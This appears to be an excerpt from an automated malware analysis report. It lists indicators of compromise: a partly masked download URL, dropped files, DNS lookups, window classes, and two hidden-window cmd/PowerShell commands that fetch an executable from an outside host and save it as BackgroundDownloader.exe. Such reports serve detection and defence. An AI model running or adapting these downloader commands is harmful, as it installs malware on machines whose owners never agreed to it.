Technical Information
- http://dl####rt-osvp.cf/media/info/appverifier.exe as c:/program files/backgrounddownloader.exe
- %ProgramFiles%\backgrounddownloader.exe
- %TEMP%\11061719764472882588797.tmp-shm
- %TEMP%\1106281660467252745127.tmp-shm
- %TEMP%\11061719764472882588797.tmp-shm
- %TEMP%\1106281660467252745127.tmp-shm
- http://dl####rt-osvp.cf/media/info/AppVerifier.exe
- DNS ASK br##ins.com
- DNS ASK dl####rt-osvp.cf
- ClassName: 'DDEMLMom' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%ProgramFiles%\backgrounddownloader.exe'
- '<SYSTEM32>\cmd.exe' /C powershell -Command "(New-Object Net.WebClient).DownloadFile('http://dl####rt-osvp.cf/media/info/AppVerifier.exe', 'C:/Program Files/BackgroundDownloader.exe')"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C powershell -Command "(New-Object Net.WebClient).DownloadFile('http://dl####rt-osvp.cf/media/info/AppVerifier.exe', 'C:/Program Files/BackgroundDownloader.exe')"